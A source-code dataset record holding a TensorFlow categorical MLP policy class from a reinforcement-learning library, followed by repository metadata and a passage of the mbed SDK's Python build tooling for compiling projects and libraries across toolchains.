'CategoricalMLPPolicy only works with akro.Discrete action '
'space.')
super().__init__(name, env_spec)
self.obs_dim = env_spec.observation_space.flat_dim
self.action_dim = env_spec.action_space.n
self.model = MLPModel(output_dim=self.action_dim,
hidden_sizes=hidden_sizes,
hidden_nonlinearity=hidden_nonlinearity,
hidden_w_init=hidden_w_init,
hidden_b_init=hidden_b_init,
output_nonlinearity=output_nonlinearity,
output_w_init=output_w_init,
output_b_init=output_b_init,
layer_normalization=layer_normalization,
name='MLPModel')
self._initialize()
def _initialize(self):
state_input = tf.compat.v1.placeholder(tf.float32,
shape=(None, self.obs_dim))
with tf.compat.v1.variable_scope(self.name) as vs:
self._variable_scope = vs
self.model.build(state_input)
self._f_prob = tf.compat.v1.get_default_session().make_callable(
self.model.networks['default'].outputs,
feed_list=[self.model.networks['default'].input])
@property
def vectorized(self):
"""Vectorized or not."""
return True
def dist_info_sym(self, obs_var, state_info_vars=None, name=None):
"""Symbolic graph of the distribution."""
with tf.compat.v1.variable_scope(self._variable_scope):
prob = self.model.build(obs_var, name=name)
return dict(prob=prob)
def dist_info(self, obs, state_infos=None):
"""Distribution info."""
prob = self._f_prob(obs)
return dict(prob=prob)
def get_action(self, observation):
"""Return a single action."""
flat_obs = self.observation_space.flatten(observation)
prob = self._f_prob([flat_obs])[0]
action = self.action_space.weighted_sample(prob)
return action, dict(prob=prob)
def get_actions(self, observations):
"""Return multiple actions."""
flat_obs = self.observation_space.flatten_n(observations)
probs = self._f_prob(flat_obs)
actions = list(map(self.action_space.weighted_sample, probs))
return actions, dict(prob=probs)
def get_regularizable_vars(self):
"""Get regularizable weight variables under the Policy scope."""
trainable = self.get_trainable_vars()
return [
var for var in trainable
if 'hidden' in var.name and 'kernel' in var.name
]
@property
def distribution(self):
"""Policy distribution."""
return Categorical(self.action_dim)
def __getstate__(self):
"""Object.__getstate__."""
new_dict = super().__getstate__()
del new_dict['_f_prob']
return new_dict
def __setstate__(self, state):
"""Object.__setstate__."""
super().__setstate__(state)
self._initialize()
| 39.71831
| 78
| 0.623227
|
import akro
import tensorflow as tf
from metarl.tf.distributions import Categorical
from metarl.tf.models import MLPModel
from metarl.tf.policies import StochasticPolicy
class CategoricalMLPPolicy(StochasticPolicy):
def __init__(self,
env_spec,
name='CategoricalMLPPolicy',
hidden_sizes=(32, 32),
hidden_nonlinearity=tf.nn.tanh,
hidden_w_init=tf.glorot_uniform_initializer(),
hidden_b_init=tf.zeros_initializer(),
output_nonlinearity=tf.nn.softmax,
output_w_init=tf.glorot_uniform_initializer(),
output_b_init=tf.zeros_initializer(),
layer_normalization=False):
assert isinstance(env_spec.action_space, akro.Discrete), (
'CategoricalMLPPolicy only works with akro.Discrete action '
'space.')
super().__init__(name, env_spec)
self.obs_dim = env_spec.observation_space.flat_dim
self.action_dim = env_spec.action_space.n
self.model = MLPModel(output_dim=self.action_dim,
hidden_sizes=hidden_sizes,
hidden_nonlinearity=hidden_nonlinearity,
hidden_w_init=hidden_w_init,
hidden_b_init=hidden_b_init,
output_nonlinearity=output_nonlinearity,
output_w_init=output_w_init,
output_b_init=output_b_init,
layer_normalization=layer_normalization,
name='MLPModel')
self._initialize()
def _initialize(self):
state_input = tf.compat.v1.placeholder(tf.float32,
shape=(None, self.obs_dim))
with tf.compat.v1.variable_scope(self.name) as vs:
self._variable_scope = vs
self.model.build(state_input)
self._f_prob = tf.compat.v1.get_default_session().make_callable(
self.model.networks['default'].outputs,
feed_list=[self.model.networks['default'].input])
@property
def vectorized(self):
return True
def dist_info_sym(self, obs_var, state_info_vars=None, name=None):
with tf.compat.v1.variable_scope(self._variable_scope):
prob = self.model.build(obs_var, name=name)
return dict(prob=prob)
def dist_info(self, obs, state_infos=None):
prob = self._f_prob(obs)
return dict(prob=prob)
def get_action(self, observation):
flat_obs = self.observation_space.flatten(observation)
prob = self._f_prob([flat_obs])[0]
action = self.action_space.weighted_sample(prob)
return action, dict(prob=prob)
def get_actions(self, observations):
flat_obs = self.observation_space.flatten_n(observations)
probs = self._f_prob(flat_obs)
actions = list(map(self.action_space.weighted_sample, probs))
return actions, dict(prob=probs)
def get_regularizable_vars(self):
trainable = self.get_trainable_vars()
return [
var for var in trainable
if 'hidden' in var.name and 'kernel' in var.name
]
@property
def distribution(self):
return Categorical(self.action_dim)
def __getstate__(self):
new_dict = super().__getstate__()
del new_dict['_f_prob']
return new_dict
def __setstate__(self, state):
super().__setstate__(state)
self._initialize()
| true
| true
|
790b1bcb65b0002b2304c49056b552d8e13c6713
| 54,457
|
py
|
Python
|
os-lib/mbed-os/tools/build_api.py
|
ghsecuritylab/BenchIoT
|
4919427d35e578a7ff07ef5e0b4710b6455dd0b9
|
[
"Apache-2.0"
] | 22
|
2019-05-03T03:39:09.000Z
|
2022-02-26T17:14:15.000Z
|
os-lib/mbed-os/tools/build_api.py
|
ghsecuritylab/BenchIoT
|
4919427d35e578a7ff07ef5e0b4710b6455dd0b9
|
[
"Apache-2.0"
] | 3
|
2019-07-29T19:48:49.000Z
|
2022-01-10T07:24:43.000Z
|
os-lib/mbed-os/tools/build_api.py
|
ghsecuritylab/BenchIoT
|
4919427d35e578a7ff07ef5e0b4710b6455dd0b9
|
[
"Apache-2.0"
] | 8
|
2019-05-16T08:02:33.000Z
|
2021-08-03T03:41:37.000Z
|
"""
mbed SDK
Copyright (c) 2011-2016 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import datetime
import uuid
from types import ListType
from shutil import rmtree
from os.path import join, exists, dirname, basename, abspath, normpath, splitext
from os.path import relpath
from os import linesep, remove, makedirs
from time import time
from intelhex import IntelHex
from json import load, dump
from tools.utils import mkdir, run_cmd, run_cmd_ext, NotSupportedException,\
ToolException, InvalidReleaseTargetException, intelhex_offset
from tools.paths import MBED_CMSIS_PATH, MBED_TARGETS_PATH, MBED_LIBRARIES,\
MBED_HEADER, MBED_DRIVERS, MBED_PLATFORM, MBED_HAL, MBED_CONFIG_FILE,\
MBED_LIBRARIES_DRIVERS, MBED_LIBRARIES_PLATFORM, MBED_LIBRARIES_HAL,\
BUILD_DIR
from tools.targets import TARGET_NAMES, TARGET_MAP
from tools.libraries import Library
from tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
from tools.config import Config
RELEASE_VERSIONS = ['2', '5']
def prep_report(report, target_name, toolchain_name, id_name):
"""Setup report keys
Positional arguments:
report - the report to fill
target_name - the target being used
toolchain_name - the toolchain being used
id_name - the name of the executable or library being built
"""
if not target_name in report:
report[target_name] = {}
if not toolchain_name in report[target_name]:
report[target_name][toolchain_name] = {}
if not id_name in report[target_name][toolchain_name]:
report[target_name][toolchain_name][id_name] = []
def prep_properties(properties, target_name, toolchain_name, vendor_label):
"""Setup test properties
Positional arguments:
properties - the dict to fill
target_name - the target the test is targeting
toolchain_name - the toolchain that will compile the test
vendor_label - the vendor
"""
if not target_name in properties:
properties[target_name] = {}
if not toolchain_name in properties[target_name]:
properties[target_name][toolchain_name] = {}
properties[target_name][toolchain_name]["target"] = target_name
properties[target_name][toolchain_name]["vendor"] = vendor_label
properties[target_name][toolchain_name]["toolchain"] = toolchain_name
def create_result(target_name, toolchain_name, id_name, description):
"""Create a result dictionary
Positional arguments:
target_name - the target being built for
toolchain_name - the toolchain doing the building
id_name - the name of the executable or library being built
description - a human readable description of what's going on
"""
cur_result = {}
cur_result["target_name"] = target_name
cur_result["toolchain_name"] = toolchain_name
cur_result["id"] = id_name
cur_result["description"] = description
cur_result["elapsed_time"] = 0
cur_result["output"] = ""
return cur_result
def add_result_to_report(report, result):
"""Add a single result to a report dictionary
Positional arguments:
report - the report to append to
result - the result to append
"""
result["date"] = datetime.datetime.utcnow().isoformat()
result["uuid"] = str(uuid.uuid1())
target = result["target_name"]
toolchain = result["toolchain_name"]
id_name = result['id']
result_wrap = {0: result}
report[target][toolchain][id_name].append(result_wrap)
def get_config(src_paths, target, toolchain_name):
"""Get the configuration object for a target-toolchain combination
Positional arguments:
src_paths - paths to scan for the configuration files
target - the device we are building for
toolchain_name - the string that identifies the build tools
"""
# Convert src_paths to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Pass all params to the unified prepare_resources()
toolchain = prepare_toolchain(src_paths, None, target, toolchain_name)
# Scan src_path for config files
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
# Update configuration files until added features creates no changes
prev_features = set()
while True:
# Update the configuration with any .json files found while scanning
toolchain.config.add_config_files(resources.json_files)
# Add features while we find new ones
features = set(toolchain.config.get_features())
if features == prev_features:
break
for feature in features:
if feature in resources.features:
resources += resources.features[feature]
prev_features = features
toolchain.config.validate_config()
if toolchain.config.has_regions:
_ = list(toolchain.config.regions)
cfg, macros = toolchain.config.get_config_data()
features = toolchain.config.get_features()
return cfg, macros, features
def is_official_target(target_name, version):
""" Returns True, None if a target is part of the official release for the
given version. Return False, 'reason' if a target is not part of the
official release for the given version.
Positional arguments:
target_name - Name if the target (ex. 'K64F')
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
result = True
reason = None
target = TARGET_MAP[target_name]
if hasattr(target, 'release_versions') \
and version in target.release_versions:
if version == '2':
# For version 2, either ARM or uARM toolchain support is required
required_toolchains = set(['ARM', 'uARM'])
if not len(required_toolchains.intersection(
set(target.supported_toolchains))) > 0:
result = False
reason = ("Target '%s' must support " % target.name) + \
("one of the folowing toolchains to be included in the") + \
((" mbed 2.0 official release: %s" + linesep) %
", ".join(required_toolchains)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(target.supported_toolchains))
elif version == '5':
# For version 5, ARM, GCC_ARM, and IAR toolchain support is required
required_toolchains = set(['ARM', 'GCC_ARM', 'IAR'])
required_toolchains_sorted = list(required_toolchains)
required_toolchains_sorted.sort()
supported_toolchains = set(target.supported_toolchains)
supported_toolchains_sorted = list(supported_toolchains)
supported_toolchains_sorted.sort()
if not required_toolchains.issubset(supported_toolchains):
result = False
reason = ("Target '%s' must support " % target.name) + \
("ALL of the folowing toolchains to be included in the") + \
((" mbed OS 5.0 official release: %s" + linesep) %
", ".join(required_toolchains_sorted)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(supported_toolchains_sorted))
elif not target.default_lib == 'std':
result = False
reason = ("Target '%s' must set the " % target.name) + \
("'default_lib' to 'std' to be included in the ") + \
("mbed OS 5.0 official release." + linesep) + \
("Currently it is set to '%s'" % target.default_lib)
else:
result = False
reason = ("Target '%s' has set an invalid release version of '%s'" %
version) + \
("Please choose from the following release versions: %s" %
', '.join(RELEASE_VERSIONS))
else:
result = False
if not hasattr(target, 'release_versions'):
reason = "Target '%s' " % target.name
reason += "does not have the 'release_versions' key set"
elif not version in target.release_versions:
reason = "Target '%s' does not contain the version '%s' " % \
(target.name, version)
reason += "in its 'release_versions' key"
return result, reason
def transform_release_toolchains(toolchains, version):
""" Given a list of toolchains and a release version, return a list of
only the supported toolchains for that release
Positional arguments:
toolchains - The list of toolchains
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
if version == '5':
return ['ARM', 'GCC_ARM', 'IAR']
else:
return toolchains
def get_mbed_official_release(version):
""" Given a release version string, return a tuple that contains a target
and the supported toolchains for that release.
Ex. Given '2', return (('LPC1768', ('ARM', 'GCC_ARM')),
('K64F', ('ARM', 'GCC_ARM')), ...)
Positional arguments:
version - The version string. Should be a string contained within
RELEASE_VERSIONS
"""
mbed_official_release = (
tuple(
tuple(
[
TARGET_MAP[target].name,
tuple(transform_release_toolchains(
TARGET_MAP[target].supported_toolchains, version))
]
) for target in TARGET_NAMES \
if (hasattr(TARGET_MAP[target], 'release_versions')
and version in TARGET_MAP[target].release_versions)
)
)
for target in mbed_official_release:
is_official, reason = is_official_target(target[0], version)
if not is_official:
raise InvalidReleaseTargetException(reason)
return mbed_official_release
def add_regions_to_profile(profile, config, toolchain_class):
"""Add regions to the build profile, if there are any.
Positional Arguments:
profile - the profile to update
config - the configuration object that owns the region
toolchain_class - the class of the toolchain being used
"""
if not profile:
return
regions = list(config.regions)
for region in regions:
for define in [(region.name.upper() + "_ADDR", region.start),
(region.name.upper() + "_SIZE", region.size)]:
profile["common"].append("-D%s=0x%x" % define)
active_region = [r for r in regions if r.active][0]
for define in [("MBED_APP_START", active_region.start),
("MBED_APP_SIZE", active_region.size)]:
profile["ld"].append(toolchain_class.make_ld_define(*define))
print("Using regions in this build:")
for region in regions:
print(" Region %s size 0x%x, offset 0x%x"
% (region.name, region.size, region.start))
def prepare_toolchain(src_paths, build_dir, target, toolchain_name,
macros=None, clean=False, jobs=1,
notify=None, silent=False, verbose=False,
extra_verbose=False, config=None,
app_config=None, build_profile=None):
""" Prepares resource related objects - toolchain, target, config
Positional arguments:
src_paths - the paths to source directories
target - ['LPC1768', 'LPC11U24', etc.]
toolchain_name - ['ARM', 'uARM', 'GCC_ARM', 'GCC_CR']
Keyword arguments:
macros - additional macros
clean - Rebuild everything if True
jobs - how many compilers we can run at once
notify - Notify function for logs
silent - suppress printing of progress indicators
verbose - Write the actual tools command lines used if True
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a list of mergeable build profiles
"""
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
# If the configuration object was not yet created, create it now
config = config or Config(target, src_paths, app_config=app_config)
target = config.target
try:
cur_tc = TOOLCHAIN_CLASSES[toolchain_name]
except KeyError:
raise KeyError("Toolchain %s not supported" % toolchain_name)
profile = {'c': [], 'cxx': [], 'common': [], 'asm': [], 'ld': []}
for contents in build_profile or []:
for key in profile:
profile[key].extend(contents[toolchain_name][key])
if config.has_regions:
add_regions_to_profile(profile, config, cur_tc)
toolchain = cur_tc(target, notify, macros, silent, build_dir=build_dir,
extra_verbose=extra_verbose, build_profile=profile)
toolchain.config = config
toolchain.jobs = jobs
toolchain.build_all = clean
toolchain.VERBOSE = verbose
return toolchain
def merge_region_list(region_list, destination, padding=b'\xFF'):
"""Merege the region_list into a single image
Positional Arguments:
region_list - list of regions, which should contain filenames
destination - file name to write all regions to
padding - bytes to fill gapps with
"""
merged = IntelHex()
print("Merging Regions:")
for region in region_list:
if region.active and not region.filename:
raise ToolException("Active region has no contents: No file found.")
if region.filename:
print(" Filling region %s with %s" % (region.name, region.filename))
part = intelhex_offset(region.filename, offset=region.start)
part_size = (part.maxaddr() - part.minaddr()) + 1
if part_size > region.size:
raise ToolException("Contents of region %s does not fit"
% region.name)
merged.merge(part)
pad_size = region.size - part_size
if pad_size > 0 and region != region_list[-1]:
print(" Padding region %s with 0x%x bytes" % (region.name, pad_size))
merged.puts(merged.maxaddr() + 1, padding * pad_size)
if not exists(dirname(destination)):
makedirs(dirname(destination))
print("Space used after regions merged: 0x%x" %
(merged.maxaddr() - merged.minaddr() + 1))
with open(destination, "wb+") as output:
merged.tofile(output, format='bin')
def scan_resources(src_paths, toolchain, dependencies_paths=None,
inc_dirs=None, base_path=None, collect_ignores=False):
""" Scan resources using initialized toolcain
Positional arguments
src_paths - the paths to source directories
toolchain - valid toolchain object
dependencies_paths - dependency paths that we should scan for include dirs
inc_dirs - additional include directories which should be added to
the scanner resources
"""
# Scan src_path
resources = toolchain.scan_resources(src_paths[0], base_path=base_path,
collect_ignores=collect_ignores)
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path, base_path=base_path,
collect_ignores=collect_ignores))
# Scan dependency paths for include dirs
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
resources.inc_dirs.extend(lib_resources.inc_dirs)
# Add additional include directories if passed
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Load resources into the config system which might expand/modify resources
# based on config data
resources = toolchain.config.load_resources(resources)
# Set the toolchain's configuration data
toolchain.set_config_data(toolchain.config.get_config_data())
if (hasattr(toolchain.target, "release_versions") and
"5" not in toolchain.target.release_versions and
"rtos" in toolchain.config.lib_config_data):
if "Cortex-A" in toolchain.target.core:
raise NotSupportedException(
("%s Will be supported in mbed OS 5.6. "
"To use the %s, please checkout the mbed OS 5.4 release branch. "
"See https://developer.mbed.org/platforms/Renesas-GR-PEACH/#important-notice "
"for more information") % (toolchain.target.name, toolchain.target.name))
else:
raise NotSupportedException("Target does not support mbed OS 5")
return resources
def build_project(src_paths, build_path, target, toolchain_name,
libraries_paths=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None,
macros=None, inc_dirs=None, jobs=1, silent=False,
report=None, properties=None, project_id=None,
project_description=None, extra_verbose=False, config=None,
app_config=None, build_profile=None, stats_depth=None):
""" Build a project. A project may be a test or a user program.
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the project
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
libraries_paths - The location of libraries to include when linking
linker_script - the file that drives the linker to do it's job
clean - Rebuild everything if True
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
name - the name of the project
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
project_id - the name put in the report
project_description - the human-readable version of what this thing does
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
stats_depth - depth level for memap to display file/dirs
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Extend src_paths wiht libraries_paths
if libraries_paths is not None:
src_paths.extend(libraries_paths)
inc_dirs.extend(map(dirname, libraries_paths))
if clean and exists(build_path):
rmtree(build_path)
mkdir(build_path)
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent, verbose=verbose,
extra_verbose=extra_verbose, config=config, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
name = (name or toolchain.config.name or
basename(normpath(abspath(src_paths[0]))))
toolchain.info("Building project %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = project_description if project_description else name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain, inc_dirs=inc_dirs)
# Change linker script if specified
if linker_script is not None:
resources.linker_script = linker_script
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
if toolchain.config.has_regions:
res, _ = toolchain.link_program(resources, build_path, name + "_application")
region_list = list(toolchain.config.regions)
region_list = [r._replace(filename=res) if r.active else r
for r in region_list]
res = join(build_path, name) + ".bin"
merge_region_list(region_list, res)
else:
res, _ = toolchain.link_program(resources, build_path, name)
memap_instance = getattr(toolchain, 'memap_instance', None)
memap_table = ''
if memap_instance:
# Write output to stdout in text (pretty table) format
memap_table = memap_instance.generate_output('table', stats_depth)
if not silent:
print memap_table
# Write output to file in JSON format
map_out = join(build_path, name + "_map.json")
memap_instance.generate_output('json', stats_depth, map_out)
# Write output to file in CSV format for the CI
map_csv = join(build_path, name + "_map.csv")
memap_instance.generate_output('csv-ci', stats_depth, map_csv)
resources.detect_duplicates(toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output() + memap_table
cur_result["result"] = "OK"
cur_result["memory_usage"] = memap_instance.mem_report
cur_result["bin"] = res
cur_result["elf"] = splitext(res)[0] + ".elf"
cur_result.update(toolchain.report)
add_result_to_report(report, cur_result)
return res
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
else:
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, name=None, clean=False,
archive=True, notify=None, verbose=False, macros=None,
inc_dirs=None, jobs=1, silent=False, report=None,
properties=None, extra_verbose=False, project_id=None,
remove_config_header_file=False, app_config=None,
build_profile=None):
""" Build a library
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the library
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
dependencies_paths - The location of libraries to include when linking
name - the name of the library
clean - Rebuild everything if True
archive - whether the library will create an archive file
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
extra_verbose - even more output!
project_id - the name that goes in the report
remove_config_header_file - delete config header file when done building
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Build path
if archive:
# Use temp path when building archive
tmp_path = join(build_path, '.temp')
mkdir(tmp_path)
else:
tmp_path = build_path
# Clean the build directory
if clean and exists(tmp_path):
rmtree(tmp_path)
mkdir(tmp_path)
# Pass all params to the unified prepare_toolchain()
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent,
verbose=verbose, extra_verbose=extra_verbose, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
if name is None:
name = basename(normpath(abspath(src_paths[0])))
toolchain.info("Building library %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
cur_result['type'] = 'library'
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain,
dependencies_paths=dependencies_paths,
inc_dirs=inc_dirs)
# Copy headers, objects and static libraries - all files needed for
# static lib
toolchain.copy_files(resources.headers, build_path, resources=resources)
toolchain.copy_files(resources.objects, build_path, resources=resources)
toolchain.copy_files(resources.libraries, build_path,
resources=resources)
toolchain.copy_files(resources.json_files, build_path,
resources=resources)
if resources.linker_script:
toolchain.copy_files(resources.linker_script, build_path,
resources=resources)
if resources.hex_files:
toolchain.copy_files(resources.hex_files, build_path,
resources=resources)
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
if archive:
toolchain.build_library(objects, build_path, name)
if remove_config_header_file:
config_header_path = toolchain.get_config_header()
if config_header_path:
remove(config_header_path)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, ToolException):
cur_result["result"] = "FAIL"
elif isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
######################
### Legacy methods ###
######################
def mbed2_obj_path(target_name, toolchain_name):
real_tc_name = TOOLCHAIN_CLASSES[toolchain_name].__name__
return join("TARGET_" + target_name, "TOOLCHAIN_" + real_tc_name)
def build_lib(lib_id, target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Legacy method for building mbed libraries
Positional arguments:
lib_id - the library's unique identifier
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
clean - Rebuild everything if True
verbose - Write the actual tools command lines used if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
lib = Library(lib_id)
if not lib.is_supported(target, toolchain_name):
print('Library "%s" is not yet supported on target %s with toolchain %s'
% (lib_id, target.name, toolchain_name))
return False
# We need to combine macros from parameter list with macros from library
# definition
lib_macros = lib.macros if lib.macros else []
if macros:
macros.extend(lib_macros)
else:
macros = lib_macros
src_paths = lib.source_dir
build_path = lib.build_dir
dependencies_paths = lib.dependencies
inc_dirs = lib.inc_dirs
inc_dirs_ext = lib.inc_dirs_ext
if type(src_paths) != ListType:
src_paths = [src_paths]
# The first path will give the name to the library
name = basename(src_paths[0])
if report != None:
start = time()
id_name = name.upper()
description = name
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
# Toolchain instance
# Create the desired build directory structure
bin_path = join(build_path, mbed2_obj_path(target.name, toolchain_name))
mkdir(bin_path)
tmp_path = join(build_path, '.temp', mbed2_obj_path(target.name,
toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
src_paths, tmp_path, target, toolchain_name, macros=macros,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
toolchain.info("Building library %s (%s, %s)" %
(name.upper(), target.name, toolchain_name))
# Take into account the library configuration (MBED_CONFIG_FILE)
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Add extra include directories / files which are required by library
# This files usually are not in the same directory as source files so
# previous scan will not include them
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
dependencies_include_dir.extend(map(dirname, lib_resources.inc_dirs))
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
# Add other discovered configuration data to the configuration object
for res in resources:
config.load_resources(res)
toolchain.set_config_data(toolchain.config.get_config_data())
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path,
resources=resource)
dependencies_include_dir.extend(
toolchain.scan_resources(build_path).inc_dirs)
# Compile Sources
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, dependencies_include_dir))
needed_update = toolchain.build_library(objects, bin_path, name)
if report != None and needed_update:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
# We do have unique legacy conventions about how we build and package the mbed
# library
def build_mbed_libs(target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Function returns True is library was built and false if building was
skipped
Positional arguments:
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
verbose - Write the actual tools command lines used if True
clean - Rebuild everything if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
if report != None:
start = time()
id_name = "MBED"
description = "mbed SDK"
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
# Check toolchain support
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print('%s target is not yet supported by toolchain %s' %
(target.name, toolchain_name))
print('%s target supports %s toolchain%s' %
(target.name, supported_toolchains_text, 's'
if len(target.supported_toolchains) > 1 else ''))
if report != None:
cur_result["result"] = "SKIP"
add_result_to_report(report, cur_result)
return False
try:
# Source and Build Paths
build_target = join(MBED_LIBRARIES, "TARGET_" + target.name)
build_toolchain = join(MBED_LIBRARIES, mbed2_obj_path(target.name, toolchain_name))
mkdir(build_toolchain)
# Toolchain
